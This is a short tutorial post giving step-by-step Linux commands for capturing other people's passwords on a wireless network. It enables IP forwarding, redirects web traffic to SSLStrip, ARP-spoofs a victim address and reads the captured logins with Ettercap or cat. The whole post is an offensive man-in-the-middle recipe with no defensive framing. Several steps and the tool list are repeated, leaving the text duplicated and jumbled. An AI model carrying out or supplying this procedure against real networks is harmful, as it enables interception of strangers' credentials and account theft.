Today we will learn how to sniff ssl passwords over wireless lan.
Tools Required ( this is for linux )
ArpSpoof
SSLStrip
Ettercap
ArpSpoof
SSLStrip
Ettercap
Step 1: echo 1 >/proc/sys/net/ipv4/ip_forward
Step 2: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-ports 10000
Step 3: sslstrip -l 10000 -w data
Step 4: arpspoof -i wlan0 -t 192.168.1.158 192.168.1.1
Once the ARP spoof begins, just sit back and wait as everything is recorded in our “data” file. Once you think someone might have logged into an SSL encrypted site, kill arpspoof and SSLstrip. Now take a look what we have captured.
Step 4: ettercap -T -q -i wlan0
or
Step 4: cat data
and finally we got this :D
Step 2: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-ports 10000
Step 3: sslstrip -l 10000 -w data
Step 4: arpspoof -i wlan0 -t 192.168.1.158 192.168.1.1
Once the ARP spoof begins, just sit back and wait as everything is recorded in our “data” file. Once you think someone might have logged into an SSL encrypted site, kill arpspoof and SSLstrip. Now take a look what we have captured.
Step 4: ettercap -T -q -i wlan0
and finally we got this :D
